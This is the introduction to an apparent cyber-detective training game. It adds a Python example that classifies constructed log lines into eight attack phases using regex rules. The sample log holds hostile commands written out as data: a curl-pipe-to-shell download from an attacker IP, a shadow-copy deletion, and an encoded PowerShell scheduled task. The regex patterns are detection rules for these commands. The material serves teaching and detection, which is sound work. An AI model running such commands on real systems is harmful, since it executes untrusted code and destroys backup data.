Welcome, Detective
Your mission: Analyze system logs from security incidents and classify each event according to the Cyber Kill Chain framework.
The Cyber Kill Chain
Note: the eight phases used in this game carry MITRE ATT&CK tactic names. The original Lockheed Martin Cyber Kill Chain has seven phases (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives). Classify each event by the phase description below that fits it, not by the Lockheed Martin model.
1. Reconnaissance
Gathering information about the target (scanning, enumeration, research)
2. Initial Access
First entry into the system (phishing, exploits, brute force)
3. Execution
Running attacker-controlled code on the compromised system (scripts, command interpreters, downloaded payloads)
4. Persistence
Maintaining access to the system (backdoors, scheduled tasks)
5. Privilege Escalation
Gaining higher-level permissions (exploits, credential theft)
6. Lateral Movement
Moving from the first compromised host to other systems in the network (remote logons, admin shares, remote execution tools)
7. Exfiltration
Transferring data out of the compromised environment to attacker-controlled infrastructure
8. Impact
Causing damage (encryption, deletion, disruption)
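The following Python script is an added example and is not part of the game or its original page. It shows how the phase descriptions above turn into concrete log evidence: one constructed log line per phase, an ordered rule table that maps a line to a phase, and a progression view that reads the whole log as an intrusion timeline. All log lines are constructed, the regular expressions are illustrative heuristics rather than a production detector, and the function names (classify, triage, progression) are the example's own.

```python
"""Rule-based triage helper for the eight kill chain phases used in this game.
Added example: log lines are constructed and the regexes are heuristics."""
import re

PHASES = (
    "Reconnaissance", "Initial Access", "Execution", "Persistence",
    "Privilege Escalation", "Lateral Movement", "Exfiltration", "Impact",
)

# Ordered (phase, pattern) rules; the first match wins. Order matters:
# "schtasks /create ... powershell -enc" names a persistence mechanism AND an
# execution engine, and the mechanism decides the phase, so Persistence is
# tested before Execution. Destructive commands are tested first so that
# "vssadmin delete shadows" is filed under Impact, not under Execution just
# because a process was created.
RULES = [
    ("Impact", re.compile(r"vssadmin\s+delete\s+shadows|cipher\s+/w|\.locked\b|ransom", re.I)),
    ("Exfiltration", re.compile(r"rclone\s+copy|outbound.*bytes=\d{9,}", re.I)),
    ("Lateral Movement", re.compile(r"psexec|wmic\s+/node|logon\s+type[=: ]+3\b.*ntlm", re.I)),
    ("Privilege Escalation", re.compile(r"sudo:.*COMMAND=|SeDebugPrivilege|setuid", re.I)),
    ("Persistence", re.compile(r"schtasks\s+/create|crontab\s+-e|CurrentVersion\\Run|systemctl\s+enable|authorized_keys", re.I)),
    ("Execution", re.compile(r"powershell.*-enc|cmd\.exe\s+/c|mshta|wscript|bash\s+-c|process created", re.I)),
    ("Initial Access", re.compile(r"Accepted\s+password|Failed\s+password|phish|macro\s+enabled|CVE-\d{4}-\d+", re.I)),
    ("Reconnaissance", re.compile(r"port\s*scan|nmap|enumerat|zone\s+transfer", re.I)),
]

# Constructed sample log (not real data): one line per phase, one benign line.
SAMPLE_LOG = [
    "2024-05-02T09:14:11 fw01 IDS alert: port scan from 203.0.113.45 against 10.0.0.5 (1024 ports in 20s)",
    "2024-05-02T09:20:37 srv01 sshd[2213]: Accepted password for backup from 203.0.113.45 port 51022 ssh2",
    "2024-05-02T09:21:05 srv01 audit: process created: bash -c 'curl http://203.0.113.45/s.sh | sh'",
    "2024-05-02T09:22:48 srv01 audit: write to /home/backup/.ssh/authorized_keys by pid 4410",
    "2024-05-02T09:25:10 srv01 sudo: backup : TTY=pts/0 ; PWD=/home/backup ; USER=root ; COMMAND=/bin/bash",
    "2024-05-02T09:31:42 dc01 Security 4624: logon type=3 user=svc_backup from 10.0.0.5 auth=NTLM",
    '2024-05-02T09:45:00 ws07 Sysmon 1: schtasks /create /tn Updater /tr "powershell -enc SQBFAFgA" /sc onlogon',
    "2024-05-02T09:50:03 fw01 outbound flow 10.0.0.5 -> 203.0.113.45:443 bytes=2147483648",
    "2024-05-02T09:52:19 srv02 audit: process created: vssadmin delete shadows /all /quiet",
    "2024-05-02T10:00:00 srv01 systemd[1]: Started Daily apt download activities.",
]


def classify(line: str) -> str:
    """Return the first matching phase for one log line, or 'Unclassified'."""
    for phase, pattern in RULES:
        if pattern.search(line):
            return phase
    return "Unclassified"


def triage(lines):
    """Classify every line, keeping raw log order: [(phase, line), ...]."""
    return [(classify(line), line) for line in lines]


def progression(lines):
    """Distinct phases in order of first appearance, benign lines dropped.
    Reading this against PHASES shows how far the intrusion progressed."""
    seen = []
    for phase, _ in triage(lines):
        if phase != "Unclassified" and phase not in seen:
            seen.append(phase)
    return seen


if __name__ == "__main__":
    for phase, line in triage(SAMPLE_LOG):
        print(f"{phase:<21} {line}")
    print("progression:", " -> ".join(progression(SAMPLE_LOG)))
```

Two details carry over to the game itself. First, the same tool appears in several phases (a shell is spawned during Execution, by a scheduled task for Persistence, and by sudo for Privilege Escalation), so classify by what the event achieves, not by which binary ran. Second, a single sudo or NTLM logon line is not proof of attack on its own; it is the position of the line in the sequence, after a suspicious Initial Access event, that makes it a Privilege Escalation or Lateral Movement finding.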
You'll investigate 8 cases. Click a log entry to select it, then click the correct kill chain phase to classify it. You have 45 seconds per case. Good luck, Detective!